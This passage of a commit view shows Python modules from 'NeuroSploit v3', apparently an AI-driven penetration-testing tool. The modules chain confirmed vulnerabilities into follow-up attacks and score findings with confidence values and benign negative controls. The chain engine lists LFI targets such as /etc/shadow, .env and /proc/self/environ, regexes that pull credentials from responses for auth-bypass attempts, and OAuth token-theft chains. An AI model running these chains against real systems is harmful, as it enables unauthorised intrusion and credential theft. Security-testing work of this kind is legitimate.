derived_types=["lfi", "xxe", "command_injection", "ssrf"],
extraction_fn="_extract_internal_urls",
priority=1,
description="SSRF \u2192 internal service attacks",
),
ChainRule(
trigger_type="sqli_error",
derived_types=["sqli_union", "sqli_blind", "sqli_time"],
extraction_fn="_extract_db_context",
priority=1,
description="SQLi error \u2192 advanced SQLi techniques",
),
ChainRule(
trigger_type="information_disclosure",
derived_types=["auth_bypass", "default_credentials"],
extraction_fn="_extract_credentials",
priority=1,
description="Info disclosure \u2192 credential-based attacks",
),
ChainRule(
trigger_type="idor",
derived_types=["idor", "bola", "bfla"],
extraction_fn="_extract_idor_patterns",
priority=2,
description="IDOR on one resource \u2192 same pattern on sibling resources",
),
ChainRule(
trigger_type="lfi",
derived_types=["sqli", "auth_bypass", "information_disclosure"],
extraction_fn="_extract_config_paths",
priority=1,
description="LFI \u2192 config file extraction \u2192 credential discovery",
),
ChainRule(
trigger_type="xss_reflected",
derived_types=["xss_stored", "cors_misconfiguration"],
extraction_fn="_extract_xss_chain",
priority=2,
description="Reflected XSS \u2192 stored XSS / CORS chain for session theft",
),
ChainRule(
trigger_type="open_redirect",
derived_types=["ssrf", "oauth_misconfiguration"],
extraction_fn="_extract_redirect_chain",
priority=1,
description="Open redirect \u2192 OAuth token theft chain",
),
ChainRule(
trigger_type="default_credentials",
derived_types=["auth_bypass", "privilege_escalation", "idor"],
extraction_fn="_extract_auth_chain",
priority=1,
description="Default creds \u2192 authenticated attacks",
),
ChainRule(
trigger_type="exposed_admin_panel",
derived_types=["default_credentials", "auth_bypass", "brute_force"],
extraction_fn="_extract_admin_chain",
priority=1,
description="Exposed admin \u2192 credential attack on admin panel",
),
ChainRule(
trigger_type="subdomain_takeover",
derived_types=["xss_reflected", "xss_stored", "ssrf"],
extraction_fn="_extract_subdomain_targets",
priority=3,
description="Subdomain discovery \u2192 new attack surface",
),
]
class ChainEngine:
"""Exploit chain engine for finding correlation and derived target generation.
When a vulnerability is confirmed, this engine:
1. Checks chain rules for matching trigger types
2. Extracts derived targets using rule-specific extraction functions
3. Generates ChainableTarget objects for the agent to test
4. Tracks chain depth to prevent infinite recursion
5. Builds an attack graph of finding \u2192 finding relationships
Usage:
engine = ChainEngine()
derived = await engine.on_finding(finding, recon, memory)
for target in derived:
# Test target through normal vuln testing pipeline
pass
"""
MAX_CHAIN_DEPTH = 3
MAX_DERIVED_PER_FINDING = 20
def __init__(self, llm=None):
self.llm = llm
self._chain_graph: Dict[str, List[str]] = {} # finding_id \u2192 [derived_finding_ids]
self._total_chains = 0
self._chain_findings: List[str] = [] # finding IDs that came from chaining
async def on_finding(
self,
finding: Any,
recon: Any = None,
memory: Any = None,
) -> List[ChainableTarget]:
"""Process a confirmed finding and generate derived targets.
Args:
finding: The confirmed Finding object
recon: ReconData with target info
memory: AgentMemory for dedup
Returns:
List of ChainableTarget objects to test
"""
vuln_type = getattr(finding, "vulnerability_type", "")
finding_id = getattr(finding, "id", str(id(finding)))
chain_depth = getattr(finding, "_chain_depth", 0)
# Prevent infinite chaining
if chain_depth >= self.MAX_CHAIN_DEPTH:
return []
derived_targets = []
for rule in CHAIN_RULES:
# Check trigger match (exact or prefix)
if not self._matches_trigger(vuln_type, rule.trigger_type):
continue
# Extract targets using rule's extraction function
extractor = getattr(self, rule.extraction_fn, None)
if not extractor:
continue
try:
targets = extractor(finding, recon)
for target in targets[:self.MAX_DERIVED_PER_FINDING]:
target.chain_depth = chain_depth + 1
target.parent_finding_id = finding_id
target.priority = rule.priority
derived_targets.append(target)
except Exception as e:
logger.debug(f"Chain extraction failed for {rule.extraction_fn}: {e}")
# Track in graph
if derived_targets:
self._chain_graph[finding_id] = [
f"{t.vuln_type}:{t.url}" for t in derived_targets
]
self._total_chains += len(derived_targets)
logger.debug(f"Chain engine: {vuln_type} \u2192 {len(derived_targets)} derived targets")
return derived_targets[:self.MAX_DERIVED_PER_FINDING]
def _matches_trigger(self, vuln_type: str, trigger: str) -> bool:
"""Check if vuln_type matches a trigger rule."""
if vuln_type == trigger:
return True
# Allow prefix matching: sqli_error matches sqli_error
if vuln_type.startswith(trigger + "_") or trigger.startswith(vuln_type + "_"):
return True
# Special: any sqli variant triggers sqli_error rule
if trigger == "sqli_error" and vuln_type.startswith("sqli"):
return True
return False
# \u2500\u2500\u2500 Extraction Functions \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
def _extract_internal_urls(self, finding, recon) -> List[ChainableTarget]:
"""From SSRF: extract internal URLs for further attack."""
targets = []
evidence = getattr(finding, "evidence", "")
url = getattr(finding, "url", "")
# Find internal IPs in response
internal_patterns = [
r'(?:https?://)?(?:127\.\d+\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?(?:10\.\d+\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?(?:192\.168\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?(?:172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?localhost(?::\d+)?(?:/[^\s"<>]*)?',
]
found_urls = set()
for pattern in internal_patterns:
for match in re.finditer(pattern, evidence):
internal_url = match.group(0)
if not internal_url.startswith("http"):
internal_url = f"http://{internal_url}"
found_urls.add(internal_url)
# Common internal service ports
if not found_urls:
# Generate targets based on known internal ports
parsed = urlparse(url)
base_ips = ["127.0.0.1", "localhost"]
ports = [80, 8080, 8443, 3000, 5000, 8000, 9200, 6379, 27017]
for ip in base_ips:
for port in ports[:4]: # Limit
found_urls.add(f"http://{ip}:{port}/")
for internal_url in list(found_urls)[:10]:
for vuln_type in ["lfi", "command_injection", "ssrf"]:
targets.append(ChainableTarget(
url=internal_url,
param="url",
vuln_type=vuln_type,
context={"source": "ssrf_chain", "internal": True},
description=f"SSRF chain: {vuln_type} on internal {internal_url}",
))
return targets
def _extract_db_context(self, finding, recon) -> List[ChainableTarget]:
"""From SQLi error: extract DB type and generate advanced payloads."""
targets = []
evidence = getattr(finding, "evidence", "")
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
# Detect database type from error
db_type = "unknown"
db_indicators = {
"mysql": ["mysql", "mariadb", "you have an error in your sql syntax"],
"postgresql": ["postgresql", "pg_", "unterminated quoted string"],
"mssql": ["microsoft sql", "mssql", "unclosed quotation mark", "sqlserver"],
"oracle": ["ora-", "oracle", "quoted string not properly terminated"],
"sqlite": ["sqlite", "sqlite3"],
}
evidence_lower = evidence.lower()
for db, indicators in db_indicators.items():
if any(i in evidence_lower for i in indicators):
db_type = db
break
# Generate type-specific advanced SQLi targets
advanced_types = ["sqli_union", "sqli_blind", "sqli_time"]
for vuln_type in advanced_types:
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type=vuln_type,
context={"db_type": db_type, "source": "sqli_chain"},
description=f"SQLi chain: {vuln_type} ({db_type}) on {param}",
payload_hint=f"db_type={db_type}",
))
return targets
def _extract_credentials(self, finding, recon) -> List[ChainableTarget]:
"""From info disclosure: extract credentials for auth attacks."""
targets = []
evidence = getattr(finding, "evidence", "")
url = getattr(finding, "url", "")
# Extract potential credentials
cred_patterns = [
r'(?:password|passwd|pwd)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
r'(?:api_key|apikey|api-key)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
r'(?:token|secret|auth)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
r'(?:username|user|login)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
]
found_creds = {}
for pattern in cred_patterns:
matches = re.findall(pattern, evidence, re.I)
for match in matches:
if len(match) > 3: # Skip trivial matches
found_creds[pattern.split("|")[0].strip("(?")] = match
# Generate auth attack targets
if recon:
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
admin_paths = ["/admin", "/api/admin", "/dashboard", "/management"]
for path in admin_paths:
targets.append(ChainableTarget(
url=f"{base}{path}",
param="",
vuln_type="auth_bypass",
context={"discovered_creds": found_creds, "source": "info_disclosure_chain"},
description=f"Credential chain: auth bypass at {path}",
))
return targets
def _extract_idor_patterns(self, finding, recon) -> List[ChainableTarget]:
"""From IDOR: apply same pattern to sibling resources."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
parsed = urlparse(url)
path = parsed.path
# Pattern: /users/{id} \u2192 /orders/{id}, /profiles/{id}
sibling_resources = [
"users", "orders", "profiles", "accounts", "invoices",
"documents", "messages", "transactions", "settings",
"notifications", "payments", "subscriptions",
]
# Extract the resource pattern
path_parts = [p for p in path.split("/") if p]
if len(path_parts) >= 2:
# Replace the resource name with siblings
original_resource = path_parts[-2] if path_parts[-1].isdigit() else path_parts[-1]
resource_id = path_parts[-1] if path_parts[-1].isdigit() else "1"
base = f"{parsed.scheme}://{parsed.netloc}"
for sibling in sibling_resources:
if sibling != original_resource:
new_path = path.replace(original_resource, sibling)
targets.append(ChainableTarget(
url=f"{base}{new_path}",
param=param or "id",
vuln_type="idor",
context={"source": "idor_pattern_chain", "original_resource": original_resource},
description=f"IDOR chain: {sibling} (from {original_resource})",
method=getattr(finding, "method", "GET"),
))
return targets[:10]
def _extract_config_paths(self, finding, recon) -> List[ChainableTarget]:
"""From LFI: generate config file read targets."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
# Config files that may contain credentials
config_files = [
"/etc/passwd",
"/etc/shadow",
"../../../../.env",
"../../../../config/database.yml",
"../../../../wp-config.php",
"../../../../config.php",
"../../../../.git/config",
"../../../../config/secrets.yml",
"/proc/self/environ",
"../../../../application.properties",
"../../../../appsettings.json",
"../../../../web.config",
]
for config_path in config_files:
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="lfi",
context={"config_file": config_path, "source": "lfi_chain"},
description=f"LFI chain: read {config_path}",
payload_hint=config_path,
))
return targets
def _extract_xss_chain(self, finding, recon) -> List[ChainableTarget]:
"""From reflected XSS: look for stored XSS and CORS chain opportunities."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
# Look for form submission endpoints (potential stored XSS)
if recon and hasattr(recon, "forms"):
for form in getattr(recon, "forms", [])[:5]:
form_url = form.get("action", "") if isinstance(form, dict) else getattr(form, "action", "")
if form_url:
targets.append(ChainableTarget(
url=form_url,
param=param,
vuln_type="xss_stored",
context={"source": "xss_chain"},
description=f"XSS chain: stored XSS via form at {form_url}",
method="POST",
))
# Check for CORS misconfiguration chain
targets.append(ChainableTarget(
url=base + "/api/",
param="",
vuln_type="cors_misconfiguration",
context={"source": "xss_cors_chain"},
description="XSS+CORS chain: check CORS for session theft scenario",
))
return targets
def _extract_redirect_chain(self, finding, recon) -> List[ChainableTarget]:
"""From open redirect: chain to OAuth token theft."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
# OAuth endpoints to test
oauth_paths = [
"/oauth/authorize", "/auth/authorize", "/oauth2/authorize",
"/connect/authorize", "/.well-known/openid-configuration",
"/api/oauth/callback",
]
for path in oauth_paths:
targets.append(ChainableTarget(
url=f"{base}{path}",
param="redirect_uri",
vuln_type="open_redirect",
context={"source": "redirect_oauth_chain"},
description=f"Redirect chain: OAuth token theft via {path}",
))
# SSRF via redirect
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type="ssrf",
context={"source": "redirect_ssrf_chain"},
description="Redirect \u2192 SSRF chain",
))
return targets
def _extract_auth_chain(self, finding, recon) -> List[ChainableTarget]:
"""From default credentials: test all endpoints as authenticated user."""
targets = []
url = getattr(finding, "url", "")
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
# Privileged paths to test with obtained session
privileged_paths = [
"/admin", "/admin/users", "/admin/settings",
"/api/admin", "/api/users", "/api/v1/admin",
"/management", "/internal", "/debug",
]
for path in privileged_paths:
targets.append(ChainableTarget(
url=f"{base}{path}",
param="",
vuln_type="privilege_escalation",
context={"source": "auth_chain", "authenticated": True},
description=f"Auth chain: privilege escalation at {path}",
))
return targets
def _extract_admin_chain(self, finding, recon) -> List[ChainableTarget]:
"""From exposed admin panel: try default credentials and auth bypass."""
targets = []
url = getattr(finding, "url", "")
targets.append(ChainableTarget(
url=url,
param="",
vuln_type="default_credentials",
context={"source": "admin_chain"},
description=f"Admin chain: default credentials at {url}",
))
targets.append(ChainableTarget(
url=url,
param="",
vuln_type="auth_bypass",
context={"source": "admin_chain"},
description=f"Admin chain: auth bypass at {url}",
))
return targets
def _extract_subdomain_targets(self, finding, recon) -> List[ChainableTarget]:
"""From subdomain discovery: add as new attack targets."""
targets = []
evidence = getattr(finding, "evidence", "")
# Extract subdomains from evidence
subdomain_pattern = r'(?:https?://)?([a-zA-Z0-9][-a-zA-Z0-9]*\.[-a-zA-Z0-9.]+)'
found_domains = set(re.findall(subdomain_pattern, evidence))
for domain in list(found_domains)[:5]:
if not domain.startswith("http"):
domain_url = f"https://{domain}"
else:
domain_url = domain
targets.append(ChainableTarget(
url=domain_url,
param="",
vuln_type="xss_reflected",
context={"source": "subdomain_chain"},
description=f"Subdomain chain: test {domain}",
priority=3,
))
return targets
# \u2500\u2500\u2500 AI Correlation \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
async def ai_correlate(self, findings: List[Any], llm=None) -> List[Dict]:
"""AI-driven correlation of multiple findings into attack chains.
Analyzes all findings together to identify multi-step attack scenarios.
"""
llm = llm or self.llm
if not llm or not hasattr(llm, "generate"):
return []
if len(findings) < 2:
return []
try:
findings_summary = []
for f in findings[:20]:
findings_summary.append(
f"- {getattr(f, 'vulnerability_type', '?')}: "
f"{getattr(f, 'url', '?')} "
f"(param: {getattr(f, 'parameter', '?')}, "
f"confidence: {getattr(f, 'confidence_score', '?')})"
)
prompt = f"""Analyze these confirmed vulnerability findings for potential exploit chains.
FINDINGS:
{chr(10).join(findings_summary)}
For each chain you identify, describe:
1. The attack scenario (2-3 sentences)
2. Which findings are linked
3. The impact if chained together
4. Priority (critical/high/medium)
Return ONLY realistic chains where one finding directly enables or amplifies another.
If no meaningful chains exist, say "No chains identified."
Format each chain as: CHAIN: [scenario] | FINDINGS: [types] | IMPACT: [impact] | PRIORITY: [level]"""
result = await llm.generate(prompt)
if not result:
return []
# Parse chains
chains = []
for line in result.strip().split("\n"):
if line.startswith("CHAIN:"):
parts = line.split("|")
chain = {
"scenario": parts[0].replace("CHAIN:", "").strip() if len(parts) > 0 else "",
"findings": parts[1].replace("FINDINGS:", "").strip() if len(parts) > 1 else "",
"impact": parts[2].replace("IMPACT:", "").strip() if len(parts) > 2 else "",
"priority": parts[3].replace("PRIORITY:", "").strip() if len(parts) > 3 else "medium",
}
chains.append(chain)
return chains
except Exception as e:
logger.debug(f"AI chain correlation failed: {e}")
return []
# \u2500\u2500\u2500 Reporting \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
def get_attack_graph(self) -> Dict[str, List[str]]:
"""Get the attack chain graph."""
return dict(self._chain_graph)
def get_chain_stats(self) -> Dict:
"""Get chain statistics for reporting."""
return {
"total_chains_generated": self._total_chains,
"graph_nodes": len(self._chain_graph),
"chain_findings": len(self._chain_findings),
}
+179
View File
@@ -0,0 +1,179 @@
"""
NeuroSploit v3 - Confidence Scoring Engine
Numeric 0-100 confidence scoring for vulnerability findings.
Combines proof of execution, negative control results, and signal analysis
into a single score with transparent breakdown.
Score Thresholds:
>= 90 → "confirmed" (AI Verified, high confidence)
>= 60 → "likely" (needs manual review)
< 60 → "rejected" (auto-reject, false positive)
"""
import logging
from dataclasses import dataclass, field
from typing import Dict, List, Optional
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Result types
# ---------------------------------------------------------------------------
@dataclass
class ConfidenceResult:
"""Result of confidence scoring."""
score: int # 0-100
verdict: str # "confirmed" | "likely" | "rejected"
breakdown: Dict[str, int] = field(default_factory=dict) # Component scores
detail: str = "" # Human-readable explanation
# ---------------------------------------------------------------------------
# Scorer
# ---------------------------------------------------------------------------
class ConfidenceScorer:
"""Calculates numeric confidence score 0-100 for vulnerability findings.
Weights:
+0-60 Proof of execution (per vuln type — the most important signal)
+0-30 Proof of impact (severity-aware)
+0-20 Negative controls passed (response differs from benign)
-40 Only baseline diff signal (no actual proof of exploitation)
-60 Same behavior on negative controls (critical false positive indicator)
-40 AI interpretation says payload was ineffective
"""
# Threshold constants
THRESHOLD_CONFIRMED = 90
THRESHOLD_LIKELY = 60
# Weight caps
MAX_PROOF_SCORE = 60
MAX_IMPACT_SCORE = 30
MAX_CONTROLS_BONUS = 20
PENALTY_ONLY_DIFF = -40
PENALTY_SAME_BEHAVIOR = -60
PENALTY_AI_INEFFECTIVE = -40
# Keywords in AI interpretation that indicate payload was ineffective
INEFFECTIVE_KEYWORDS = [
"ignored", "not processed", "blocked", "filtered",
"sanitized", "rejected", "not executed", "was not",
"does not", "did not", "no effect", "no impact",
"benign", "safe", "harmless",
]
def calculate(
self,
signals: List[str],
proof_result, # ProofResult from proof_of_execution
control_result, # NegativeControlResult from negative_control
ai_interpretation: Optional[str] = None,
) -> ConfidenceResult:
"""Calculate confidence score from all verification components.
Args:
signals: List of signal names from multi_signal_verify
(e.g., ["baseline_diff", "payload_effect"])
proof_result: ProofResult from ProofOfExecution.check()
control_result: NegativeControlResult from NegativeControlEngine
ai_interpretation: Optional AI response interpretation text
Returns:
ConfidenceResult with score, verdict, breakdown, and detail
"""
breakdown: Dict[str, int] = {}
score = 0
# ── Component 1: Proof of Execution (0-60) ────────────────────
proof_score = min(proof_result.score, self.MAX_PROOF_SCORE) if proof_result else 0
score += proof_score
breakdown["proof_of_execution"] = proof_score
# ── Component 2: Proof of Impact (0-30) ───────────────────────
impact_score = 0
if proof_result and proof_result.proven:
if proof_result.impact_demonstrated:
impact_score = self.MAX_IMPACT_SCORE # Full impact shown
else:
impact_score = 15 # Proven but no impact demonstration
score += impact_score
breakdown["proof_of_impact"] = impact_score
# ── Component 3: Negative Controls (bonus/penalty) ─────────────
controls_score = 0
if control_result:
if control_result.same_behavior:
controls_score = self.PENALTY_SAME_BEHAVIOR # -60
else:
controls_score = min(
self.MAX_CONTROLS_BONUS,
control_result.confidence_adjustment
) # +20
score += controls_score
breakdown["negative_controls"] = controls_score
# ── Penalty: Only baseline diff signal ─────────────────────────
diff_penalty = 0
if signals and set(signals) <= {"baseline_diff", "new_errors"}:
# Only diff-based signals, no actual payload effect
if proof_score == 0:
diff_penalty = self.PENALTY_ONLY_DIFF # -40
score += diff_penalty
breakdown["diff_only_penalty"] = diff_penalty
# ── Penalty: AI says payload was ineffective ──────────────────
ai_penalty = 0
if ai_interpretation:
ai_lower = ai_interpretation.lower()
if any(kw in ai_lower for kw in self.INEFFECTIVE_KEYWORDS):
ai_penalty = self.PENALTY_AI_INEFFECTIVE # -40
score += ai_penalty
breakdown["ai_ineffective_penalty"] = ai_penalty
# ── Clamp and determine verdict ────────────────────────────────
score = max(0, min(100, score))
if score >= self.THRESHOLD_CONFIRMED:
verdict = "confirmed"
elif score >= self.THRESHOLD_LIKELY:
verdict = "likely"
else:
verdict = "rejected"
# Build detail string
detail_parts = []
if proof_result and proof_result.proven:
detail_parts.append(f"Proof: {proof_result.proof_type} ({proof_score}pts)")
else:
detail_parts.append("No proof of execution (0pts)")
if impact_score > 0:
detail_parts.append(f"Impact: +{impact_score}pts")
if control_result:
if control_result.same_behavior:
detail_parts.append(
f"NEGATIVE CONTROL FAIL: {control_result.controls_matching}/"
f"{control_result.controls_run} same behavior ({controls_score}pts)")
else:
detail_parts.append(f"Controls passed (+{controls_score}pts)")
if diff_penalty:
detail_parts.append(f"Only-diff penalty ({diff_penalty}pts)")
if ai_penalty:
detail_parts.append(f"AI-ineffective penalty ({ai_penalty}pts)")
detail = f"Score: {score}/100 [{verdict}] — " + "; ".join(detail_parts)
return ConfidenceResult(
score=score,
verdict=verdict,
breakdown=breakdown,
detail=detail,
)
+159
View File
@@ -0,0 +1,159 @@
"""
NeuroSploit v3 - Execution History
Tracks attack success/failure patterns across scans to learn what works.
Records technology-to-vulnerability-type mappings with success rates.
Used by the AI to prioritize tests based on historical data.
"""
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
from collections import defaultdict
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
class ExecutionHistory:
"""Tracks which attacks work against which technologies across scans."""
MAX_ATTACKS = 500 # Keep last N attack records
def __init__(self, history_file: str = "data/execution_history.json"):
self.history_file = Path(history_file)
self._attacks: List[Dict] = []
# tech_lower -> vuln_type -> {"success": int, "fail": int}
self._tech_success: Dict[str, Dict[str, Dict[str, int]]] = {}
self._dirty = False
self._load()
def _load(self):
"""Load execution history from disk."""
if not self.history_file.exists():
return
try:
data = json.loads(self.history_file.read_text())
self._attacks = data.get("attacks", [])
for tech, vulns in data.get("tech_success", {}).items():
self._tech_success[tech] = {}
for vuln, counts in vulns.items():
self._tech_success[tech][vuln] = {
"success": counts.get("success", 0),
"fail": counts.get("fail", 0),
}
logger.info(f"Loaded execution history: {len(self._attacks)} attacks, "
f"{len(self._tech_success)} technologies tracked")
except Exception as e:
logger.warning(f"Failed to load execution history: {e}")
def _save(self):
"""Persist execution history to disk."""
try:
self.history_file.parent.mkdir(parents=True, exist_ok=True)
self.history_file.write_text(json.dumps({
"attacks": self._attacks[-self.MAX_ATTACKS:],
"tech_success": self._tech_success,
"saved_at": datetime.utcnow().isoformat(),
}, indent=2, default=str))
self._dirty = False
except Exception as e:
logger.warning(f"Failed to save execution history: {e}")
def record(self, tech_stack: List[str], vuln_type: str,
target: str, success: bool, evidence: str = ""):
"""Record an attack attempt result."""
if not vuln_type:
return
# Record the individual attack
try:
domain = urlparse(target).netloc if target else ""
except Exception:
domain = ""
self._attacks.append({
"tech": [t[:50] for t in tech_stack[:5]],
"vuln_type": vuln_type,
"target_domain": domain,
"success": success,
"evidence_preview": (evidence or "")[:100],
"timestamp": datetime.utcnow().isoformat(),
})
# Update aggregated tech_success counters
key = "success" if success else "fail"
for tech in tech_stack[:5]:
tech_lower = tech.lower().strip()
if not tech_lower:
continue
if tech_lower not in self._tech_success:
self._tech_success[tech_lower] = {}
if vuln_type not in self._tech_success[tech_lower]:
self._tech_success[tech_lower][vuln_type] = {"success": 0, "fail": 0}
self._tech_success[tech_lower][vuln_type][key] += 1
# Auto-save periodically (every 20 records)
self._dirty = True
if len(self._attacks) % 20 == 0:
self._save()
def flush(self):
"""Force save if there are unsaved changes."""
if self._dirty:
self._save()
def get_priority_types(self, tech_stack: List[str], top_n: int = 15) -> List[str]:
"""Get vuln types most likely to succeed based on tech stack history."""
scores: Dict[str, float] = defaultdict(float)
for tech in tech_stack:
tech_lower = tech.lower().strip()
if tech_lower not in self._tech_success:
continue
for vuln_type, counts in self._tech_success[tech_lower].items():
total = counts.get("success", 0) + counts.get("fail", 0)
if total < 2:
continue # Need at least 2 data points
rate = counts.get("success", 0) / total
# Weight by both success rate and volume
scores[vuln_type] += rate * total
sorted_types = sorted(scores.items(), key=lambda x: x[1], reverse=True)
return [t[0] for t in sorted_types[:top_n]]
def get_stats_for_prompt(self, tech_stack: List[str]) -> str:
"""Format execution history as context for AI prompts."""
lines = []
for tech in tech_stack[:5]:
tech_lower = tech.lower().strip()
if tech_lower not in self._tech_success:
continue
vulns = self._tech_success[tech_lower]
top = sorted(
vulns.items(),
key=lambda x: x[1].get("success", 0),
reverse=True
)[:5]
if top:
entries = []
for v, c in top:
s = c.get("success", 0)
total = s + c.get("fail", 0)
entries.append(f"{v}({s}/{total})")
lines.append(f" {tech}: {', '.join(entries)}")
return "\n".join(lines) if lines else " No historical data yet"
def get_total_attacks(self) -> int:
"""Get total number of recorded attacks."""
return len(self._attacks)
def get_success_rate(self) -> float:
"""Get overall success rate."""
if not self._attacks:
return 0.0
successes = sum(1 for a in self._attacks if a.get("success"))
return successes / len(self._attacks)
+321
View File
@@ -0,0 +1,321 @@
"""
NeuroSploit v3 - Negative Control Engine
Sends benign/control payloads and compares responses to detect false positives
from same-behavior patterns. If the application responds the same way to a
benign value as it does to an attack payload, the finding is likely a false positive.
"""
import hashlib
import logging
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple, Any
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Result types
# ---------------------------------------------------------------------------
@dataclass
class ControlTestResult:
"""Result of a single control test."""
control_type: str # "benign", "empty", "no_param"
control_value: str # The control payload used
status_match: bool # Did status code match attack response?
length_similar: bool # Body length within threshold?
hash_match: bool # Exact body match?
same_behavior: bool # Overall: does this control look the same?
detail: str = ""
@dataclass
class NegativeControlResult:
"""Aggregated result of all negative control tests."""
same_behavior: bool # True if ANY control shows same behavior as attack
controls_run: int # How many controls were executed
controls_matching: int # How many showed same behavior
confidence_adjustment: int # Penalty to apply (typically -60 if same_behavior)
results: List[ControlTestResult] = field(default_factory=list)
detail: str = ""
# ---------------------------------------------------------------------------
# Engine
# ---------------------------------------------------------------------------
class NegativeControlEngine:
"""Sends control payloads to detect false positives from same-behavior responses.
The key insight: if the application responds identically to "test123" and
to "<script>alert(1)</script>", then the XSS payload was NOT processed —
the application simply ignores or sanitizes the parameter entirely.
"""
# Benign values that should NEVER trigger a vulnerability
BENIGN_PAYLOADS: Dict[str, List[str]] = {
# XSS: plain text, no special chars
"xss_reflected": ["test123", "hello world"],
"xss_stored": ["test123", "hello world"],
"xss_dom": ["test123", "hello world"],
"xss": ["test123", "hello world"],
# SQLi: normal numeric/text values
"sqli": ["1", "test"],
"sqli_error": ["1", "test"],
"sqli_union": ["1", "test"],
"sqli_blind": ["1", "test"],
"sqli_time": ["1", "test"],
# SSRF: safe external URL or plain text
"ssrf": ["https://www.example.com", "test"],
"ssrf_cloud": ["https://www.example.com", "test"],
# LFI: safe existing page or plain text
"lfi": ["index.html", "test.txt"],
"path_traversal": ["index.html", "test.txt"],
# SSTI: plain text, no template syntax
"ssti": ["hello", "12345"],
# RCE: plain text, no shell metacharacters
"rce": ["test", "hello"],
"command_injection": ["test", "hello"],
# Open redirect: safe internal URL
"open_redirect": ["/", "/index.html"],
# CRLF: normal header value
"crlf_injection": ["test-value", "normal"],
"header_injection": ["test-value", "normal"],
# XXE: plain text (no XML entities)
"xxe": ["test", "hello"],
# NoSQL: normal value
"nosql_injection": ["test", "1"],
# Host header: normal hostname
"host_header_injection": ["localhost", "example.com"],
# Default for any unlisted type
"default": ["test123", "benign_value"],
}
# Body length similarity threshold (percentage)
LENGTH_THRESHOLD_PCT = 5.0 # Within 5% = "same"
async def run_controls(
self,
url: str,
param: str,
method: str,
vuln_type: str,
attack_response: Dict,
make_request_fn: Callable,
baseline: Optional[Dict] = None,
injection_point: str = "parameter",
) -> NegativeControlResult:
"""Run negative control tests and compare with the attack response.
Args:
url: Target URL
param: Parameter name being tested
method: HTTP method
vuln_type: Vulnerability type
attack_response: The response from the attack payload
make_request_fn: Async function to make HTTP requests
baseline: Optional baseline response
injection_point: Where payload is injected (parameter, header, body, path)
Returns:
NegativeControlResult with same_behavior flag and details
"""
results: List[ControlTestResult] = []
controls_matching = 0
attack_status = attack_response.get("status", 0)
attack_body = attack_response.get("body", "")
attack_length = len(attack_body)
attack_hash = hashlib.md5(
attack_body.encode("utf-8", errors="replace")
).hexdigest()
# Get benign payloads for this vuln type
base_type = vuln_type.split("_")[0] if "_" in vuln_type else vuln_type
benign_values = self.BENIGN_PAYLOADS.get(
vuln_type,
self.BENIGN_PAYLOADS.get(base_type, self.BENIGN_PAYLOADS["default"])
)
# Control 1: Benign payload
for benign in benign_values[:2]:
try:
control_resp = await self._send_control(
url, param, method, benign, make_request_fn, injection_point
)
if control_resp:
result = self._compare_responses(
"benign", benign, attack_status, attack_length,
attack_hash, control_resp
)
results.append(result)
if result.same_behavior:
controls_matching += 1
except Exception as e:
logger.debug(f"Negative control (benign) failed: {e}")
# Control 2: Empty value
try:
control_resp = await self._send_control(
url, param, method, "", make_request_fn, injection_point
)
if control_resp:
result = self._compare_responses(
"empty", "", attack_status, attack_length,
attack_hash, control_resp
)
results.append(result)
if result.same_behavior:
controls_matching += 1
except Exception as e:
logger.debug(f"Negative control (empty) failed: {e}")
# Control 3: Request without the parameter entirely (if applicable)
if injection_point == "parameter" and param:
try:
control_resp = await self._send_without_param(
url, param, method, make_request_fn
)
if control_resp:
result = self._compare_responses(
